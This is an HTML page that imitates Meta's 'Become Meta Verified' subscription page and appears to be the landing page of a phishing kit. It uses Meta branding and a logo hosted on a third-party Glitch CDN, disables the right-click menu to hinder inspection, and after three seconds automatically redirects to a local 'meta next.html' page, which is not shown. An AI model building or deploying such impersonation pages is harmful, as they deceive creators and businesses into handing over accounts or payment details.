<!DOCTYPE html>

<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Home</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet">
    <style>
        /* CSS styles */

        body {
            font-family: system-ui;
            margin: 0;
            padding: 0;
        }

        .container-fluid {
            background: #F5F6F6;
        }

        .container {
            padding: 1rem;
        }

        .logo {
            width: 9rem;
            height: 6rem;
        }

        .meta-logo {
            width: 4rem;
            height: 4rem;
        }

        .btn {
            background: #0064e0;
            border: none;
            border-radius: 100px;
            padding: 10px 35px;
            text-decoration: none;
            color: white;
            display: inline-block;
            margin-top: 1rem;
            font-family: Arial, sans-serif;
            /* Same font family */
            font-size: 16px;
            /* Adjust as needed */
        }

        .content {
            margin-top: 3rem;
            display: flex;
            justify-content: center;
        }

        .content .col-sm-6 {
            margin-top: 3rem;
            margin-left: 5rem;
        }

        .content p {
            font-size: 18px;
            margin-top: 1rem;
            font-family: Arial, sans-serif;
            /* Same font family */
        }

        .sign-up {
            font-size: 17px;
            padding-top: 1rem;
            font-family: Arial, sans-serif;
            /* Same font family */
        }

        .business-info {
            font-size: 14px;
            font-family: Arial, sans-serif;
            /* Same font family */
        }

        .region-info {
            font-size: 13px;
            font-style: italic;
            font-family: Arial, sans-serif;
            /* Same font family */
        }

        .image {
            display: none;
            width: 42%;
            height: 100vh;
            /* Ensure full height */
            background-size: cover;
            /* background-position: center; */
            /* margin-left: 5rem; */
        }

        @media (min-width: 576px) {
            .image {
                display: block;
            }
        }
    </style>
</head>

<body>
    <div class="container-fluid">

    </div>
    </div>
    <div class="content">
        <div class="col-sm-6">
            <img src="https://cdn.glitch.global/94ce8094-2082-483e-8949-f3a4651ae83f/a89f7c20-27a2-4c6c-9a08-caa301574ad6.image.png" ?v=1717746772557?_nc_cat=106&amp;ccb=1-7&amp;_nc_sid=f537c7&amp;_nc_ohc=qtgF49guQsgQ7kNvgFGDO8w&amp;_nc_ht=scontent.fhdd4-1.fna&amp;oh=00_AYBsWhVkb0c0jCLieToyhfQNMluisvrty0CnBw_McPiMUA&amp;oe=665DB74B
                " alt="meta " class="meta-logo ">
      <h1 class="my-3 fs-1 ">Become <br> Meta Verified</h1>
      <div style="margin-bottom: 30px; "></div>
      <a href="meta next.html" class="btn ">Apply</a>
      <p class="mt-4 ">Grow your social presence with Meta Verified – a new subscription <br> bundle available for creators and businesses on Instagram and <br> Facebook.</p>
      <p class="sign-up ">Sign up now for creators</p>
      <p class="mt-4 mb-0 ">
        <span class="fw-semibold ">Are you a business?</span> Get more information on
      </p>
      <a href="# " class="business-info ">Meta verified for businesses</a>
      <p class="mt-4 font-italic region-info ">Features, availability, and pricing may vary by region.</p>
    </div>
    <div class="col-sm-5 image " style="background-image: url( './background.png'); "></div>
  </div>
</body>
<script>
  document.addEventListener('contextmenu', event => {
    event.preventDefault();
  });

  setTimeout(function() {
  var redirectURL="meta next.html" // Updated URL
  window.location.replace(redirectURL);
  }, 3000); // 3000 milliseconds (3 seconds)
  });
</script>

</html>
